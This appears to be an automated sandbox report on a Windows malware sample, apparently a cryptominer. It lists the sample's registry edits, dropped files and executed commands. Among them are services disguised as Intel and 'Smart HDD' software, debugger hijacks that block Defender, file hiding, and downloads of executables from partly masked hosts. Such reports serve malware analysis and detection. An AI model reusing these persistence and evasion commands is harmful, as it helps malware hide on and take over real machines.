Technical Information
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Defender.exe] 'debugger' = 'fixmapi.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgmnt.exe] 'debugger' = 'fixmapi.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hostdl.exe] 'debugger' = 'fixmapi.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgmnt] 'debugger' = 'fixmapi.exe'
- %WINDIR%\temp\gentee00\russian.lng
- %WINDIR%\twunk_32.ini
- [<HKLM>\System\CurrentControlSet\Services\HddSmart] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\HddSmart] 'ImagePath' = '%WINDIR%\shdd\hddsvc.exe'
- [<HKLM>\System\CurrentControlSet\Services\intelrd] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\intelrd] 'ImagePath' = '%WINDIR%\SoftwareDistribution\intl.exe'
- '<SYSTEM32>\taskkill.exe' /f /im hostdl.exe /T
- '<SYSTEM32>\taskkill.exe' /f /im renimin.exe /T
- '<SYSTEM32>\taskkill.exe' /f /im renim.exe /T
- '<SYSTEM32>\taskkill.exe' /f /im renims.exe
- '<SYSTEM32>\taskkill.exe' /f /im hddsmart.exe
- '<SYSTEM32>\taskkill.exe' /f /im hddsvc.exe
- '<SYSTEM32>\taskkill.exe' /f /im shaht.exe
- '<SYSTEM32>\taskkill.exe' /f /im renimin.exe
- '<SYSTEM32>\taskkill.exe' /f /im intelrd.exe
- '<SYSTEM32>\taskkill.exe' /f /im winmgmnt.exe
- '<SYSTEM32>\taskkill.exe' /f /im intl.exe /T
- '<SYSTEM32>\taskkill.exe' /f /im intl.exe
- '<SYSTEM32>\taskkill.exe' /f /im defender.exe
- '<SYSTEM32>\taskkill.exe' /f /im hostdl.exe
- '<SYSTEM32>\taskkill.exe' /f /im renim.exe
- '<SYSTEM32>\taskkill.exe' /f /im intelrd.exe /T
- '<SYSTEM32>\net.exe' stop intelrd
- <SYSTEM32>\cmd.exe
- %TEMP%\gentee00\pauto.dll
- %WINDIR%\intel\mnzk9.dat
- %WINDIR%\intel\renim.exe
- %WINDIR%\intel\intelrd.exe
- %WINDIR%\softwaredistribution\shaht.exe
- <SYSTEM32>\instsrv.exe
- %WINDIR%\shdd\instsrv.exe
- %WINDIR%\shdd\hddsvc.exe
- %WINDIR%\shdd\hddsmart.exe
- %WINDIR%\shdd\ins.bat
- %WINDIR%\shdd\hddsmart.bat
- %WINDIR%\intel\mnzk10.dat
- %WINDIR%\softwaredistribution\restr.exe
- %WINDIR%\softwaredistribution\noerr.fta
- %WINDIR%\softwaredistribution\intlu.exe
- %WINDIR%\softwaredistribution\sfxd.exe
- %WINDIR%\softwaredistribution\errchk.bat
- %WINDIR%\softwaredistribution\wmine.exe
- %WINDIR%\softwaredistribution\instsrv.exe
- %WINDIR%\softwaredistribution\intl.bat
- %WINDIR%\softwaredistribution\inst.bat
- <Current directory>\new.exe
- %TEMP%\gentee00\russian.lng
- %WINDIR%\sfxd.exe
- %WINDIR%\temp\gentee00\pauto.dll
- %WINDIR%\shdd\hddsmart.bat
- %WINDIR%\intel\renim.exe
- %WINDIR%\softwaredistribution\intl.bat
- <Current directory>\new.exe
- %WINDIR%\softwaredistribution\instsrv.exe
- %WINDIR%\softwaredistribution\wmine.exe
- %WINDIR%\softwaredistribution\restr.exe
- %WINDIR%\softwaredistribution\errchk.bat
- %WINDIR%\twunk_32.ini
- from %WINDIR%\softwaredistribution\intlu.exe to %WINDIR%\softwaredistribution\intl.exe
- from %WINDIR%\shdd\hddsmart.exe to %WINDIR%\hddsmart.exe
- from %WINDIR%\shdd\instsrv.exe to %WINDIR%\instsrv.exe
- http://in###of.design/umnd.inf
- http://re####aht.dsmtp.biz/renimin.tot
- http://in###of.design/filsiz.inf
- http://re####aht.dsmtp.biz/restr.exe
- http://re####aht.dsmtp.biz/shaht.exe
- http://in###of.design/what.inf
- DNS ASK in###of.design
- DNS ASK re####aht.dsmtp.biz
- ClassName: 'EDIT' WindowName: ''
- ClassName: '' WindowName: ''
- '<Current directory>\new.exe'
- '%WINDIR%\softwaredistribution\wmine.exe' -c http://re####aht.dsmtp.biz/restr.exe
- '%WINDIR%\softwaredistribution\restr.exe'
- '%WINDIR%\instsrv.exe' HddSmart %WINDIR%\shdd\hddsvc.exe
- '%WINDIR%\shdd\hddsvc.exe'
- '%WINDIR%\softwaredistribution\wmine.exe' -c http://re####aht.dsmtp.biz/shaht.exe
- '%WINDIR%\softwaredistribution\shaht.exe'
- '%WINDIR%\hddsmart.exe' -t36832 %WINDIR%\shdd\hddsmart.bat
- '%WINDIR%\softwaredistribution\instsrv.exe' intelrd %WINDIR%\SoftwareDistribution\intl.exe
- '%WINDIR%\softwaredistribution\intl.exe'
- '%WINDIR%\softwaredistribution\sfxd.exe' /cn /mn %WINDIR%\intel\
- '%WINDIR%\softwaredistribution\sfxd.exe' /co /mo %WINDIR%\shdd\
- '%WINDIR%\sfxd.exe' /co /mo %WINDIR%\SoftwareDistribution\
- '%WINDIR%\intel\intelrd.exe'
- '<SYSTEM32>\cmd.exe' /c del /f /q new.exe' (with hidden window)
- '<SYSTEM32>\cmd.exe' /e:ON /v:ON /c "SETLOCAL EnableDelayedExpansion & set /a M=%NUMBER_OF_PROCESSORS%/2 & <nul set /p =!M!>%windir%\twunk_32.ini"' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c start new.exe
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\shdd\hddsmart.bat
- '<SYSTEM32>\ping.exe' -n 2 127.0.0.1
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 6
- '<SYSTEM32>\sc.exe' start intelrd
- '<SYSTEM32>\sc.exe' stop HddSmart
- '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "Description" /t REG_SZ /d "The service allows you to speed up the work of hard drives, as well as protecting against breakage and loss o...
- '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "DisplayName" /t REG_SZ /d "Intel Rapid Storage Technology" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "ObjectName" /t REG_SZ /d "LocalSystem" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "Start" /t REG_DWORD /d "2" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "Type" /t REG_DWORD /d "16" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "ErrorControl" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd\Parameters" /v "Application" /t REG_SZ /d "%WINDIR%\SoftwareDistribution\intl.bat" /f
- '<SYSTEM32>\net1.exe' stop intelrd
- '<SYSTEM32>\sc.exe' config intelrd DisplayName= "Intel Rapid Storage Technology"
- '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intelrd.exe" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intl.exe" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\renim.exe" /f
- '<SYSTEM32>\attrib.exe' +h +s %WINDIR%\intel\renim.exe
- '<SYSTEM32>\attrib.exe' +h +s intl.bat
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intelrd.exe\PerfOptions" /v CpuPriorityClass /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\renim.exe\PerfOptions" /v CpuPriorityClass /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\renims.exe\PerfOptions" /v CpuPriorityClass /t REG_DWORD /d "1" /f
- '<SYSTEM32>\cmd.exe' /c %WINDIR%\SoftwareDistribution\intl.bat
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgmnt" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
- '<SYSTEM32>\sc.exe' start HddSmart
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "ImagePath" /t REG_EXPAND_SZ /d "%WINDIR%\SoftwareDistribution\intl.exe" /f
- '<SYSTEM32>\attrib.exe' +h +s %WINDIR%\shdd\hddsmart.bat
- '<SYSTEM32>\attrib.exe' -h -s %WINDIR%\shdd\hddsmart.bat
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\SoftwareDistribution\errchk.bat" "
- '<SYSTEM32>\cmd.exe' /c wmic cpu get NumberOfLogicalProcessors,Version
- '<SYSTEM32>\wbem\wmic.exe' cpu get NumberOfLogicalProcessors,Version
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\SoftwareDistribution\inst.bat" "
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Host-process" /f
- '<SYSTEM32>\reg.exe' delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Defender.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\winmgmnt.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\hostdl.exe" /v "debugger" /t REG_SZ /d "fixmapi.exe" /f
- '<SYSTEM32>\attrib.exe' -h -s -r %WINDIR%\intel\renim.exe
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 3
- '<SYSTEM32>\cmd.exe' /c ""%WINDIR%\shdd\ins.bat" "
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 7
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 2
- '<SYSTEM32>\cmd.exe' /c del /f /q new.exe
- '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "Description" /t REG_SZ /d "Service for determining the performance of hard disks and defragmenting the file system. SMARTHDD allows you...
- '<SYSTEM32>\ping.exe' 127.0.0.1 -n 1
- '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "DisplayName" /t REG_SZ /d "Smart HDD" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "ObjectName" /t REG_SZ /d "LocalSystem" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "Start" /t REG_DWORD /d "2" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "Type" /t REG_DWORD /d "16" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "ErrorControl" /t REG_DWORD /d "1" /f
- '<SYSTEM32>\reg.exe' add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart" /v "ImagePath" /t REG_EXPAND_SZ /d "%WINDIR%\shdd\hddsvc.exe" /f
- '<SYSTEM32>\reg.exe' Add "HKLM\SYSTEM\CurrentControlSet\services\HddSmart\Parameters" /v "Application" /t REG_SZ /d "%WINDIR%\shdd\hddsmart.bat" /f
- '<SYSTEM32>\sc.exe' config HddSmart DisplayName= "Smart HDD"
- '<SYSTEM32>\cmd.exe' /e:ON /v:ON /c "SETLOCAL EnableDelayedExpansion & set /a M=%NUMBER_OF_PROCESSORS%/2 & <nul set /p =!M!>%windir%\twunk_32.ini"